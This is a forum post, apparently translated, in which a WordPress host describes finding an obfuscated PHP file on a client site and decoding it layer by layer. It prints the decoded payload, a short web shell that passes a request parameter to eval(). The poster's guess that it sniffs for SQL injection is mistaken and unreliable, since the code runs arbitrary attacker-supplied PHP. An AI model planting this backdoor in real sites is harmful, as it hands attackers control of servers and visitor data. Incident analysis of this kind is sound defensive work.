我为小型客户网站运行了一个安装了几十个 WordPress 的 VPS。
我刚刚注意到一个站点有一个名为“pnxnfup.php”的 php 脚本,其中包含一个加载 base64 字母数字字符。
在站点的根目录中还有很多没有扩展名的文件——只是随机的字母数字字符串——其中的文件看起来像是在记录 IP 地址——我猜这些是访问者的 IP 地址(我的在里面)。
有人知道这可能是什么类型的漏洞吗?
更新:18/12/12
好的,我设法解码了 pnxnfup.php 的内容
当我解码原始 php 文件时,它包含更多 base64 编码内容,其中包含随机乱码 php 注释,我必须在解码文件的其余部分之前手动删除这些注释。
解码后,我发现更多带有更多乱码 php 注释的 base64 编码字符串。一旦我重复了剥离和解码过程(呸!),我就剩下了这个:
if(isset($_REQUEST['a'.'s'.'c']))
eval
(stripslashes($_REQUEST['a'.'sc']));
我大致了解这段代码在做什么(嗅探带有 asc 参数的请求,这将指示可能针对 sql 注入的 url),但我不明白这对黑客本身有何价值。我猜黑客必须渗透得更深,而我还遗漏了其他东西?